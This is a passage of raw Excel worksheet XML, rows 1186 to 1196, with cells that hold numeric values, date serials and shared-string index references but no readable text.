      <c r="G1186" s="1">
        <v>44322</v>
      </c>
      <c r="H1186">
        <v>10551</v>
      </c>
      <c r="I1186">
        <v>10551</v>
      </c>
      <c r="J1186">
        <v>0</v>
      </c>
      <c r="K1186">
        <v>0</v>
      </c>
      <c r="L1186">
        <v>0</v>
      </c>
      <c r="M1186">
        <v>0</v>
      </c>
      <c r="N1186">
        <v>0</v>
      </c>
      <c r="O1186">
        <v>0</v>
      </c>
      <c r="P1186">
        <v>0</v>
      </c>
      <c r="Q1186">
        <v>0</v>
      </c>
      <c r="R1186">
        <v>0</v>
      </c>
      <c r="S1186">
        <v>0</v>
      </c>
      <c r="T1186">
        <v>1</v>
      </c>
      <c r="U1186">
        <v>0</v>
      </c>
      <c r="V1186">
        <v>0</v>
      </c>
      <c r="W1186">
        <v>0</v>
      </c>
      <c r="X1186">
        <v>0</v>
      </c>
      <c r="Y1186">
        <v>0</v>
      </c>
      <c r="Z1186">
        <v>0</v>
      </c>
      <c r="AA1186">
        <v>0</v>
      </c>
      <c r="AB1186">
        <v>0</v>
      </c>
      <c r="AC1186">
        <v>0</v>
      </c>
      <c r="AD1186">
        <v>0</v>
      </c>
      <c r="AE1186">
        <v>5000</v>
      </c>
      <c r="AF1186" t="s">
        <v>8868</v>
      </c>
      <c r="AG1186">
        <v>90212</v>
      </c>
      <c r="AH1186">
        <v>26</v>
      </c>
      <c r="AJ1186">
        <v>420</v>
      </c>
      <c r="AK1186" t="s">
        <v>861</v>
      </c>
      <c r="AL1186" t="s">
        <v>4324</v>
      </c>
      <c r="AM1186" t="s">
        <v>8869</v>
      </c>
      <c r="AN1186" t="s">
        <v>55</v>
      </c>
      <c r="AO1186">
        <v>2021</v>
      </c>
      <c r="AP1186">
        <v>628126111776</v>
      </c>
      <c r="AQ1186" t="s">
        <v>8870</v>
      </c>
      <c r="AR1186" t="s">
        <v>8868</v>
      </c>
      <c r="AS1186" t="s">
        <v>71</v>
      </c>
      <c r="AT1186" t="s">
        <v>58</v>
      </c>
      <c r="AU1186">
        <v>26</v>
      </c>
      <c r="AV1186">
        <v>0</v>
      </c>
      <c r="AW1186">
        <v>2</v>
      </c>
      <c r="AX1186">
        <v>8</v>
      </c>
      <c r="AY1186">
        <v>2</v>
      </c>
      <c r="AZ1186">
        <v>0</v>
      </c>
      <c r="BA1186" t="s">
        <v>17686</v>
      </c>
      <c r="BB1186" t="s">
        <v>16159</v>
      </c>
      <c r="BC1186" t="s">
        <v>13751</v>
      </c>
      <c r="BD1186" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="1187" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1187">
        <v>2853</v>
      </c>
      <c r="B1187" t="s">
        <v>8871</v>
      </c>
      <c r="C1187" t="s">
        <v>579</v>
      </c>
      <c r="D1187" t="s">
        <v>8872</v>
      </c>
      <c r="E1187" t="s">
        <v>142</v>
      </c>
      <c r="F1187" t="s">
        <v>562</v>
      </c>
      <c r="G1187" s="1">
        <v>44322</v>
      </c>
      <c r="H1187">
        <v>10607</v>
      </c>
      <c r="I1187">
        <v>10607</v>
      </c>
      <c r="J1187">
        <v>2</v>
      </c>
      <c r="K1187">
        <v>1</v>
      </c>
      <c r="L1187">
        <v>0</v>
      </c>
      <c r="M1187">
        <v>6</v>
      </c>
      <c r="N1187">
        <v>500</v>
      </c>
      <c r="O1187">
        <v>0</v>
      </c>
      <c r="P1187">
        <v>0</v>
      </c>
      <c r="Q1187">
        <v>0</v>
      </c>
      <c r="R1187">
        <v>0</v>
      </c>
      <c r="S1187">
        <v>1</v>
      </c>
      <c r="T1187">
        <v>0</v>
      </c>
      <c r="U1187">
        <v>300000</v>
      </c>
      <c r="V1187">
        <v>1</v>
      </c>
      <c r="W1187">
        <v>0</v>
      </c>
      <c r="X1187">
        <v>450</v>
      </c>
      <c r="Y1187">
        <v>0</v>
      </c>
      <c r="Z1187">
        <v>0</v>
      </c>
      <c r="AA1187">
        <v>0</v>
      </c>
      <c r="AB1187">
        <v>0</v>
      </c>
      <c r="AC1187">
        <v>0</v>
      </c>
      <c r="AD1187">
        <v>1</v>
      </c>
      <c r="AE1187">
        <v>0</v>
      </c>
      <c r="AF1187" t="s">
        <v>8873</v>
      </c>
      <c r="AG1187">
        <v>76116</v>
      </c>
      <c r="AH1187">
        <v>23</v>
      </c>
      <c r="AJ1187">
        <v>363</v>
      </c>
      <c r="AK1187" t="s">
        <v>8874</v>
      </c>
      <c r="AL1187" t="s">
        <v>8875</v>
      </c>
      <c r="AM1187" t="s">
        <v>8876</v>
      </c>
      <c r="AN1187" t="s">
        <v>82</v>
      </c>
      <c r="AO1187">
        <v>1998</v>
      </c>
      <c r="AP1187" t="s">
        <v>8877</v>
      </c>
      <c r="AQ1187" t="s">
        <v>8878</v>
      </c>
      <c r="AR1187" t="s">
        <v>8879</v>
      </c>
      <c r="AS1187" t="s">
        <v>71</v>
      </c>
      <c r="AT1187" t="s">
        <v>86</v>
      </c>
      <c r="AU1187">
        <v>25</v>
      </c>
      <c r="AV1187">
        <v>1</v>
      </c>
      <c r="AW1187">
        <v>36</v>
      </c>
      <c r="AX1187">
        <v>8</v>
      </c>
      <c r="AY1187">
        <v>37</v>
      </c>
      <c r="AZ1187">
        <v>26</v>
      </c>
      <c r="BA1187" t="s">
        <v>16689</v>
      </c>
      <c r="BB1187" t="s">
        <v>14571</v>
      </c>
      <c r="BC1187">
        <v>0</v>
      </c>
      <c r="BD1187" t="s">
        <v>13778</v>
      </c>
    </row>
    <row r="1188" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1188">
        <v>5446</v>
      </c>
      <c r="B1188" t="s">
        <v>8880</v>
      </c>
      <c r="C1188" t="s">
        <v>60</v>
      </c>
      <c r="D1188" t="s">
        <v>8881</v>
      </c>
      <c r="E1188" t="s">
        <v>8882</v>
      </c>
      <c r="F1188" t="s">
        <v>8883</v>
      </c>
      <c r="G1188" s="1">
        <v>44337</v>
      </c>
      <c r="H1188">
        <v>10614</v>
      </c>
      <c r="I1188">
        <v>10614</v>
      </c>
      <c r="J1188">
        <v>0</v>
      </c>
      <c r="K1188">
        <v>0</v>
      </c>
      <c r="L1188">
        <v>0</v>
      </c>
      <c r="M1188">
        <v>0</v>
      </c>
      <c r="N1188">
        <v>0</v>
      </c>
      <c r="O1188">
        <v>0</v>
      </c>
      <c r="P1188">
        <v>0</v>
      </c>
      <c r="Q1188">
        <v>1</v>
      </c>
      <c r="R1188">
        <v>0</v>
      </c>
      <c r="S1188">
        <v>0</v>
      </c>
      <c r="T1188">
        <v>1</v>
      </c>
      <c r="U1188">
        <v>0</v>
      </c>
      <c r="V1188">
        <v>0</v>
      </c>
      <c r="W1188">
        <v>0</v>
      </c>
      <c r="X1188">
        <v>0</v>
      </c>
      <c r="Y1188">
        <v>0</v>
      </c>
      <c r="Z1188">
        <v>0</v>
      </c>
      <c r="AA1188">
        <v>0</v>
      </c>
      <c r="AB1188">
        <v>10</v>
      </c>
      <c r="AC1188">
        <v>0</v>
      </c>
      <c r="AD1188">
        <v>0</v>
      </c>
      <c r="AE1188">
        <v>200</v>
      </c>
      <c r="AF1188" t="s">
        <v>8884</v>
      </c>
      <c r="AG1188">
        <v>35372</v>
      </c>
      <c r="AH1188">
        <v>10</v>
      </c>
      <c r="AJ1188">
        <v>135</v>
      </c>
      <c r="AK1188" t="s">
        <v>8885</v>
      </c>
      <c r="AL1188" t="s">
        <v>8886</v>
      </c>
      <c r="AM1188" t="s">
        <v>8887</v>
      </c>
      <c r="AN1188" t="s">
        <v>68</v>
      </c>
      <c r="AO1188">
        <v>2020</v>
      </c>
      <c r="AP1188">
        <v>85279399632</v>
      </c>
      <c r="AQ1188" t="s">
        <v>8888</v>
      </c>
      <c r="AR1188" t="s">
        <v>8884</v>
      </c>
      <c r="AS1188" t="s">
        <v>71</v>
      </c>
      <c r="AT1188" t="s">
        <v>72</v>
      </c>
      <c r="AU1188">
        <v>15</v>
      </c>
      <c r="AV1188">
        <v>15</v>
      </c>
      <c r="AW1188">
        <v>0</v>
      </c>
      <c r="AX1188">
        <v>1</v>
      </c>
      <c r="AY1188">
        <v>2</v>
      </c>
      <c r="AZ1188">
        <v>5</v>
      </c>
      <c r="BA1188" t="s">
        <v>17678</v>
      </c>
      <c r="BB1188" t="s">
        <v>16155</v>
      </c>
      <c r="BC1188" t="s">
        <v>13798</v>
      </c>
      <c r="BD1188">
        <v>0</v>
      </c>
    </row>
    <row r="1189" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1189">
        <v>5193</v>
      </c>
      <c r="B1189" t="s">
        <v>8889</v>
      </c>
      <c r="C1189" t="s">
        <v>607</v>
      </c>
      <c r="D1189" t="s">
        <v>8890</v>
      </c>
      <c r="E1189" t="s">
        <v>843</v>
      </c>
      <c r="F1189" t="s">
        <v>8891</v>
      </c>
      <c r="G1189" s="1">
        <v>44343</v>
      </c>
      <c r="H1189">
        <v>10827</v>
      </c>
      <c r="I1189">
        <v>10827</v>
      </c>
      <c r="J1189">
        <v>1</v>
      </c>
      <c r="K1189">
        <v>0</v>
      </c>
      <c r="L1189">
        <v>0</v>
      </c>
      <c r="M1189">
        <v>0</v>
      </c>
      <c r="N1189">
        <v>0</v>
      </c>
      <c r="O1189">
        <v>0</v>
      </c>
      <c r="P1189">
        <v>0</v>
      </c>
      <c r="Q1189">
        <v>1</v>
      </c>
      <c r="R1189">
        <v>3</v>
      </c>
      <c r="S1189">
        <v>0</v>
      </c>
      <c r="T1189">
        <v>0</v>
      </c>
      <c r="U1189">
        <v>200</v>
      </c>
      <c r="V1189">
        <v>0</v>
      </c>
      <c r="W1189">
        <v>0</v>
      </c>
      <c r="X1189">
        <v>0</v>
      </c>
      <c r="Y1189">
        <v>0</v>
      </c>
      <c r="Z1189">
        <v>0</v>
      </c>
      <c r="AA1189">
        <v>0</v>
      </c>
      <c r="AB1189">
        <v>10</v>
      </c>
      <c r="AC1189">
        <v>300</v>
      </c>
      <c r="AD1189">
        <v>0</v>
      </c>
      <c r="AE1189">
        <v>0</v>
      </c>
      <c r="AF1189" t="s">
        <v>8892</v>
      </c>
      <c r="AG1189">
        <v>77113</v>
      </c>
      <c r="AH1189">
        <v>24</v>
      </c>
      <c r="AJ1189">
        <v>370</v>
      </c>
      <c r="AK1189" t="s">
        <v>7059</v>
      </c>
      <c r="AL1189" t="s">
        <v>7060</v>
      </c>
      <c r="AM1189" t="s">
        <v>8893</v>
      </c>
      <c r="AN1189" t="s">
        <v>55</v>
      </c>
      <c r="AO1189">
        <v>2020</v>
      </c>
      <c r="AP1189">
        <v>81254737707</v>
      </c>
      <c r="AQ1189" t="s">
        <v>8894</v>
      </c>
      <c r="AR1189" t="s">
        <v>8892</v>
      </c>
      <c r="AS1189" t="s">
        <v>71</v>
      </c>
      <c r="AT1189" t="s">
        <v>58</v>
      </c>
      <c r="AU1189">
        <v>20</v>
      </c>
      <c r="AV1189">
        <v>0</v>
      </c>
      <c r="AW1189">
        <v>0</v>
      </c>
      <c r="AX1189">
        <v>0</v>
      </c>
      <c r="AY1189">
        <v>7</v>
      </c>
      <c r="AZ1189">
        <v>0</v>
      </c>
      <c r="BA1189" t="s">
        <v>17580</v>
      </c>
      <c r="BB1189" t="s">
        <v>16109</v>
      </c>
      <c r="BC1189" t="s">
        <v>13601</v>
      </c>
      <c r="BD1189">
        <v>0</v>
      </c>
    </row>
    <row r="1190" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1190">
        <v>5220</v>
      </c>
      <c r="B1190" t="s">
        <v>8895</v>
      </c>
      <c r="C1190" t="s">
        <v>157</v>
      </c>
      <c r="D1190" t="s">
        <v>8896</v>
      </c>
      <c r="E1190" t="s">
        <v>49</v>
      </c>
      <c r="F1190" t="s">
        <v>8897</v>
      </c>
      <c r="G1190" s="1">
        <v>44369</v>
      </c>
      <c r="H1190">
        <v>10919</v>
      </c>
      <c r="I1190">
        <v>10919</v>
      </c>
      <c r="J1190">
        <v>1</v>
      </c>
      <c r="K1190">
        <v>1</v>
      </c>
      <c r="L1190">
        <v>0</v>
      </c>
      <c r="M1190">
        <v>1</v>
      </c>
      <c r="N1190">
        <v>0</v>
      </c>
      <c r="O1190">
        <v>0</v>
      </c>
      <c r="P1190">
        <v>0</v>
      </c>
      <c r="Q1190">
        <v>1</v>
      </c>
      <c r="R1190">
        <v>1</v>
      </c>
      <c r="S1190">
        <v>0</v>
      </c>
      <c r="T1190">
        <v>1</v>
      </c>
      <c r="U1190">
        <v>600</v>
      </c>
      <c r="V1190">
        <v>200</v>
      </c>
      <c r="W1190">
        <v>0</v>
      </c>
      <c r="X1190">
        <v>200</v>
      </c>
      <c r="Y1190">
        <v>0</v>
      </c>
      <c r="Z1190">
        <v>0</v>
      </c>
      <c r="AA1190">
        <v>0</v>
      </c>
      <c r="AB1190">
        <v>200</v>
      </c>
      <c r="AC1190">
        <v>200</v>
      </c>
      <c r="AD1190">
        <v>0</v>
      </c>
      <c r="AE1190">
        <v>200</v>
      </c>
      <c r="AF1190" t="s">
        <v>8898</v>
      </c>
      <c r="AG1190">
        <v>68131</v>
      </c>
      <c r="AH1190">
        <v>16</v>
      </c>
      <c r="AJ1190">
        <v>236</v>
      </c>
      <c r="AK1190" t="s">
        <v>8899</v>
      </c>
      <c r="AL1190" t="s">
        <v>8900</v>
      </c>
      <c r="AM1190" t="s">
        <v>8901</v>
      </c>
      <c r="AN1190" t="s">
        <v>68</v>
      </c>
      <c r="AO1190">
        <v>2018</v>
      </c>
      <c r="AP1190">
        <v>85101747899</v>
      </c>
      <c r="AQ1190" t="s">
        <v>8902</v>
      </c>
      <c r="AR1190" t="s">
        <v>8898</v>
      </c>
      <c r="AS1190" t="s">
        <v>71</v>
      </c>
      <c r="AT1190" t="s">
        <v>72</v>
      </c>
      <c r="AU1190">
        <v>25</v>
      </c>
      <c r="AV1190">
        <v>1</v>
      </c>
      <c r="AW1190">
        <v>0</v>
      </c>
      <c r="AX1190">
        <v>3</v>
      </c>
      <c r="AY1190">
        <v>6</v>
      </c>
      <c r="AZ1190">
        <v>9</v>
      </c>
      <c r="BA1190" t="s">
        <v>17625</v>
      </c>
      <c r="BB1190">
        <v>0</v>
      </c>
      <c r="BC1190" t="s">
        <v>13871</v>
      </c>
      <c r="BD1190" t="s">
        <v>13872</v>
      </c>
    </row>
    <row r="1191" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1191">
        <v>5495</v>
      </c>
      <c r="B1191" t="s">
        <v>8903</v>
      </c>
      <c r="C1191" t="s">
        <v>999</v>
      </c>
      <c r="D1191" t="s">
        <v>8904</v>
      </c>
      <c r="E1191" t="s">
        <v>49</v>
      </c>
      <c r="F1191" t="s">
        <v>8905</v>
      </c>
      <c r="G1191" s="1">
        <v>44344</v>
      </c>
      <c r="H1191">
        <v>11028</v>
      </c>
      <c r="I1191">
        <v>11028</v>
      </c>
      <c r="J1191">
        <v>0</v>
      </c>
      <c r="K1191">
        <v>0</v>
      </c>
      <c r="L1191">
        <v>0</v>
      </c>
      <c r="M1191">
        <v>0</v>
      </c>
      <c r="N1191">
        <v>0</v>
      </c>
      <c r="O1191">
        <v>3</v>
      </c>
      <c r="P1191">
        <v>0</v>
      </c>
      <c r="Q1191">
        <v>2</v>
      </c>
      <c r="R1191">
        <v>1</v>
      </c>
      <c r="S1191">
        <v>0</v>
      </c>
      <c r="T1191">
        <v>1</v>
      </c>
      <c r="U1191">
        <v>0</v>
      </c>
      <c r="V1191">
        <v>0</v>
      </c>
      <c r="W1191">
        <v>0</v>
      </c>
      <c r="X1191">
        <v>0</v>
      </c>
      <c r="Y1191">
        <v>0</v>
      </c>
      <c r="Z1191">
        <v>1500</v>
      </c>
      <c r="AA1191">
        <v>0</v>
      </c>
      <c r="AB1191">
        <v>100</v>
      </c>
      <c r="AC1191">
        <v>500</v>
      </c>
      <c r="AD1191">
        <v>0</v>
      </c>
      <c r="AE1191">
        <v>1000</v>
      </c>
      <c r="AF1191" t="s">
        <v>8906</v>
      </c>
      <c r="AG1191">
        <v>91314</v>
      </c>
      <c r="AH1191">
        <v>30</v>
      </c>
      <c r="AJ1191">
        <v>447</v>
      </c>
      <c r="AK1191" t="s">
        <v>2732</v>
      </c>
      <c r="AL1191" t="s">
        <v>8907</v>
      </c>
      <c r="AM1191" t="s">
        <v>8908</v>
      </c>
      <c r="AN1191" t="s">
        <v>68</v>
      </c>
      <c r="AO1191">
        <v>2011</v>
      </c>
      <c r="AP1191">
        <v>81342646927</v>
      </c>
      <c r="AQ1191" t="s">
        <v>8909</v>
      </c>
      <c r="AR1191" t="s">
        <v>8910</v>
      </c>
      <c r="AS1191" t="s">
        <v>71</v>
      </c>
      <c r="AT1191" t="s">
        <v>72</v>
      </c>
      <c r="AU1191">
        <v>6</v>
      </c>
      <c r="AV1191">
        <v>1</v>
      </c>
      <c r="AW1191">
        <v>1</v>
      </c>
      <c r="AX1191">
        <v>3</v>
      </c>
      <c r="AY1191">
        <v>2</v>
      </c>
      <c r="AZ1191">
        <v>4</v>
      </c>
      <c r="BA1191" t="s">
        <v>16146</v>
      </c>
      <c r="BB1191">
        <v>0</v>
      </c>
      <c r="BC1191" t="s">
        <v>13917</v>
      </c>
      <c r="BD1191" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1192" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1192">
        <v>4828</v>
      </c>
      <c r="B1192" t="s">
        <v>8911</v>
      </c>
      <c r="C1192" t="s">
        <v>99</v>
      </c>
      <c r="D1192" t="s">
        <v>8912</v>
      </c>
      <c r="E1192" t="s">
        <v>142</v>
      </c>
      <c r="F1192" t="s">
        <v>8913</v>
      </c>
      <c r="G1192" s="1">
        <v>44358</v>
      </c>
      <c r="H1192">
        <v>11235</v>
      </c>
      <c r="I1192">
        <v>11235</v>
      </c>
      <c r="J1192">
        <v>1</v>
      </c>
      <c r="K1192">
        <v>0</v>
      </c>
      <c r="L1192">
        <v>0</v>
      </c>
      <c r="M1192">
        <v>0</v>
      </c>
      <c r="N1192">
        <v>0</v>
      </c>
      <c r="O1192">
        <v>0</v>
      </c>
      <c r="P1192">
        <v>0</v>
      </c>
      <c r="Q1192">
        <v>0</v>
      </c>
      <c r="R1192">
        <v>0</v>
      </c>
      <c r="S1192">
        <v>1</v>
      </c>
      <c r="T1192">
        <v>0</v>
      </c>
      <c r="U1192">
        <v>70000</v>
      </c>
      <c r="V1192">
        <v>0</v>
      </c>
      <c r="W1192">
        <v>0</v>
      </c>
      <c r="X1192">
        <v>0</v>
      </c>
      <c r="Y1192">
        <v>0</v>
      </c>
      <c r="Z1192">
        <v>0</v>
      </c>
      <c r="AA1192">
        <v>0</v>
      </c>
      <c r="AB1192">
        <v>0</v>
      </c>
      <c r="AC1192">
        <v>0</v>
      </c>
      <c r="AD1192">
        <v>1</v>
      </c>
      <c r="AE1192">
        <v>0</v>
      </c>
      <c r="AF1192" t="s">
        <v>8914</v>
      </c>
      <c r="AG1192">
        <v>14440</v>
      </c>
      <c r="AH1192">
        <v>12</v>
      </c>
      <c r="AJ1192">
        <v>160</v>
      </c>
      <c r="AK1192" t="s">
        <v>396</v>
      </c>
      <c r="AL1192" t="s">
        <v>114</v>
      </c>
      <c r="AM1192" t="s">
        <v>8915</v>
      </c>
      <c r="AN1192" t="s">
        <v>55</v>
      </c>
      <c r="AO1192">
        <v>2004</v>
      </c>
      <c r="AP1192" t="s">
        <v>8916</v>
      </c>
      <c r="AQ1192" t="s">
        <v>8917</v>
      </c>
      <c r="AR1192" t="s">
        <v>8918</v>
      </c>
      <c r="AS1192" t="s">
        <v>71</v>
      </c>
      <c r="AT1192" t="s">
        <v>58</v>
      </c>
      <c r="AU1192">
        <v>24</v>
      </c>
      <c r="AV1192">
        <v>1</v>
      </c>
      <c r="AW1192">
        <v>9</v>
      </c>
      <c r="AX1192">
        <v>0</v>
      </c>
      <c r="AY1192">
        <v>0</v>
      </c>
      <c r="AZ1192">
        <v>1</v>
      </c>
      <c r="BA1192" t="s">
        <v>16631</v>
      </c>
      <c r="BB1192" t="s">
        <v>16096</v>
      </c>
      <c r="BC1192" t="s">
        <v>14012</v>
      </c>
      <c r="BD1192">
        <v>0</v>
      </c>
    </row>
    <row r="1193" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1193">
        <v>5466</v>
      </c>
      <c r="B1193" t="s">
        <v>8919</v>
      </c>
      <c r="C1193" t="s">
        <v>47</v>
      </c>
      <c r="D1193" t="s">
        <v>8920</v>
      </c>
      <c r="E1193" t="s">
        <v>142</v>
      </c>
      <c r="F1193" t="s">
        <v>8921</v>
      </c>
      <c r="G1193" s="1">
        <v>44354</v>
      </c>
      <c r="H1193">
        <v>11460</v>
      </c>
      <c r="I1193">
        <v>11460</v>
      </c>
      <c r="J1193">
        <v>3</v>
      </c>
      <c r="K1193">
        <v>0</v>
      </c>
      <c r="L1193">
        <v>1</v>
      </c>
      <c r="M1193">
        <v>2</v>
      </c>
      <c r="N1193">
        <v>0</v>
      </c>
      <c r="O1193">
        <v>0</v>
      </c>
      <c r="P1193">
        <v>0</v>
      </c>
      <c r="Q1193">
        <v>2</v>
      </c>
      <c r="R1193">
        <v>2</v>
      </c>
      <c r="S1193">
        <v>0</v>
      </c>
      <c r="T1193">
        <v>1</v>
      </c>
      <c r="U1193">
        <v>240000</v>
      </c>
      <c r="V1193">
        <v>0</v>
      </c>
      <c r="W1193">
        <v>1000</v>
      </c>
      <c r="X1193">
        <v>400</v>
      </c>
      <c r="Y1193">
        <v>0</v>
      </c>
      <c r="Z1193">
        <v>0</v>
      </c>
      <c r="AA1193">
        <v>0</v>
      </c>
      <c r="AB1193">
        <v>300</v>
      </c>
      <c r="AC1193">
        <v>300</v>
      </c>
      <c r="AD1193">
        <v>0</v>
      </c>
      <c r="AE1193">
        <v>10000</v>
      </c>
      <c r="AF1193" t="s">
        <v>8922</v>
      </c>
      <c r="AG1193">
        <v>20253</v>
      </c>
      <c r="AH1193">
        <v>2</v>
      </c>
      <c r="AJ1193">
        <v>53</v>
      </c>
      <c r="AK1193" t="s">
        <v>8923</v>
      </c>
      <c r="AL1193" t="s">
        <v>8924</v>
      </c>
      <c r="AM1193" t="s">
        <v>8925</v>
      </c>
      <c r="AN1193" t="s">
        <v>55</v>
      </c>
      <c r="AO1193">
        <v>1974</v>
      </c>
      <c r="AP1193">
        <v>616940180</v>
      </c>
      <c r="AQ1193" t="s">
        <v>8926</v>
      </c>
      <c r="AR1193" t="s">
        <v>8922</v>
      </c>
      <c r="AS1193" t="s">
        <v>71</v>
      </c>
      <c r="AT1193" t="s">
        <v>58</v>
      </c>
      <c r="AU1193">
        <v>24</v>
      </c>
      <c r="AV1193">
        <v>3</v>
      </c>
      <c r="AW1193">
        <v>70</v>
      </c>
      <c r="AX1193">
        <v>65</v>
      </c>
      <c r="AY1193">
        <v>29</v>
      </c>
      <c r="AZ1193">
        <v>33</v>
      </c>
      <c r="BA1193" t="s">
        <v>17682</v>
      </c>
      <c r="BB1193">
        <v>0</v>
      </c>
      <c r="BC1193">
        <v>0</v>
      </c>
      <c r="BD1193" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="1194" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1194">
        <v>5481</v>
      </c>
      <c r="B1194" t="s">
        <v>8927</v>
      </c>
      <c r="C1194" t="s">
        <v>47</v>
      </c>
      <c r="D1194" t="s">
        <v>8928</v>
      </c>
      <c r="E1194" t="s">
        <v>142</v>
      </c>
      <c r="F1194" t="s">
        <v>6875</v>
      </c>
      <c r="G1194" s="1">
        <v>44378</v>
      </c>
      <c r="H1194">
        <v>11801</v>
      </c>
      <c r="I1194">
        <v>11801</v>
      </c>
      <c r="J1194">
        <v>2</v>
      </c>
      <c r="K1194">
        <v>0</v>
      </c>
      <c r="L1194">
        <v>0</v>
      </c>
      <c r="M1194">
        <v>0</v>
      </c>
      <c r="N1194">
        <v>0</v>
      </c>
      <c r="O1194">
        <v>0</v>
      </c>
      <c r="P1194">
        <v>0</v>
      </c>
      <c r="Q1194">
        <v>1</v>
      </c>
      <c r="R1194">
        <v>0</v>
      </c>
      <c r="S1194">
        <v>0</v>
      </c>
      <c r="T1194">
        <v>1</v>
      </c>
      <c r="U1194">
        <v>200000</v>
      </c>
      <c r="V1194">
        <v>0</v>
      </c>
      <c r="W1194">
        <v>0</v>
      </c>
      <c r="X1194">
        <v>0</v>
      </c>
      <c r="Y1194">
        <v>0</v>
      </c>
      <c r="Z1194">
        <v>0</v>
      </c>
      <c r="AA1194">
        <v>0</v>
      </c>
      <c r="AB1194">
        <v>0</v>
      </c>
      <c r="AC1194">
        <v>0</v>
      </c>
      <c r="AD1194">
        <v>0</v>
      </c>
      <c r="AE1194">
        <v>300000</v>
      </c>
      <c r="AF1194" t="s">
        <v>8929</v>
      </c>
      <c r="AG1194">
        <v>20215</v>
      </c>
      <c r="AH1194">
        <v>2</v>
      </c>
      <c r="AJ1194">
        <v>53</v>
      </c>
      <c r="AK1194" t="s">
        <v>8930</v>
      </c>
      <c r="AL1194" t="s">
        <v>8931</v>
      </c>
      <c r="AM1194" t="s">
        <v>8932</v>
      </c>
      <c r="AN1194" t="s">
        <v>55</v>
      </c>
      <c r="AO1194">
        <v>2010</v>
      </c>
      <c r="AP1194" t="s">
        <v>8933</v>
      </c>
      <c r="AQ1194" t="s">
        <v>8934</v>
      </c>
      <c r="AR1194" t="s">
        <v>8929</v>
      </c>
      <c r="AS1194" t="s">
        <v>71</v>
      </c>
      <c r="AT1194" t="s">
        <v>58</v>
      </c>
      <c r="AU1194">
        <v>26</v>
      </c>
      <c r="AV1194">
        <v>0</v>
      </c>
      <c r="AW1194">
        <v>0</v>
      </c>
      <c r="AX1194">
        <v>0</v>
      </c>
      <c r="AY1194">
        <v>4</v>
      </c>
      <c r="AZ1194">
        <v>6</v>
      </c>
      <c r="BA1194" t="s">
        <v>17689</v>
      </c>
      <c r="BB1194" t="s">
        <v>16187</v>
      </c>
      <c r="BC1194" t="s">
        <v>14116</v>
      </c>
      <c r="BD1194">
        <v>0</v>
      </c>
    </row>
    <row r="1195" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1195">
        <v>5106</v>
      </c>
      <c r="B1195" t="s">
        <v>8935</v>
      </c>
      <c r="C1195" t="s">
        <v>477</v>
      </c>
      <c r="D1195" t="s">
        <v>8936</v>
      </c>
      <c r="E1195" t="s">
        <v>142</v>
      </c>
      <c r="F1195" t="s">
        <v>666</v>
      </c>
      <c r="G1195" s="1">
        <v>44368</v>
      </c>
      <c r="H1195">
        <v>12116</v>
      </c>
      <c r="I1195">
        <v>12116</v>
      </c>
      <c r="J1195">
        <v>1</v>
      </c>
      <c r="K1195">
        <v>0</v>
      </c>
      <c r="L1195">
        <v>4</v>
      </c>
      <c r="M1195">
        <v>0</v>
      </c>
      <c r="N1195">
        <v>0</v>
      </c>
      <c r="O1195">
        <v>0</v>
      </c>
      <c r="P1195">
        <v>0</v>
      </c>
      <c r="Q1195">
        <v>0</v>
      </c>
      <c r="R1195">
        <v>0</v>
      </c>
      <c r="S1195">
        <v>0</v>
      </c>
      <c r="T1195">
        <v>0</v>
      </c>
      <c r="U1195">
        <v>400</v>
      </c>
      <c r="V1195">
        <v>0</v>
      </c>
      <c r="W1195">
        <v>30</v>
      </c>
      <c r="X1195">
        <v>0</v>
      </c>
      <c r="Y1195">
        <v>0</v>
      </c>
      <c r="Z1195">
        <v>0</v>
      </c>
      <c r="AA1195">
        <v>0</v>
      </c>
      <c r="AB1195">
        <v>0</v>
      </c>
      <c r="AC1195">
        <v>0</v>
      </c>
      <c r="AD1195">
        <v>0</v>
      </c>
      <c r="AE1195">
        <v>0</v>
      </c>
      <c r="AF1195" t="s">
        <v>8937</v>
      </c>
      <c r="AG1195">
        <v>95883</v>
      </c>
      <c r="AH1195">
        <v>29</v>
      </c>
      <c r="AJ1195">
        <v>374</v>
      </c>
      <c r="AK1195" t="s">
        <v>8938</v>
      </c>
      <c r="AL1195" t="s">
        <v>8939</v>
      </c>
      <c r="AM1195" t="s">
        <v>8940</v>
      </c>
      <c r="AN1195" t="s">
        <v>68</v>
      </c>
      <c r="AO1195">
        <v>0</v>
      </c>
      <c r="AP1195">
        <v>82193055970</v>
      </c>
      <c r="AQ1195">
        <v>82193055970</v>
      </c>
      <c r="AR1195" t="s">
        <v>8941</v>
      </c>
      <c r="AS1195" t="s">
        <v>371</v>
      </c>
      <c r="AT1195" t="s">
        <v>72</v>
      </c>
      <c r="AU1195">
        <v>24</v>
      </c>
      <c r="AV1195">
        <v>1</v>
      </c>
      <c r="AW1195">
        <v>0</v>
      </c>
      <c r="AX1195">
        <v>0</v>
      </c>
      <c r="AY1195">
        <v>13</v>
      </c>
      <c r="AZ1195">
        <v>31</v>
      </c>
      <c r="BA1195" t="s">
        <v>17586</v>
      </c>
      <c r="BB1195">
        <v>0</v>
      </c>
      <c r="BC1195" t="s">
        <v>9536</v>
      </c>
      <c r="BD1195">
        <v>0</v>
      </c>
    </row>
    <row r="1196" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1196">
        <v>5510</v>
      </c>
      <c r="B1196" t="s">
        <v>3000</v>
      </c>
      <c r="C1196" t="s">
        <v>477</v>
      </c>
      <c r="D1196" t="s">
        <v>8942</v>
      </c>
      <c r="E1196" t="s">
        <v>142</v>
      </c>
      <c r="F1196" t="s">
        <v>666</v>
      </c>
      <c r="G1196" s="1">
        <v>44286</v>
      </c>
      <c r="H1196">
        <v>9954</v>
      </c>
      <c r="I1196">
        <v>9954</v>
      </c>
      <c r="J1196">
        <v>2</v>
      </c>
      <c r="K1196">
        <v>0</v>
      </c>
      <c r="L1196">
        <v>13</v>
      </c>
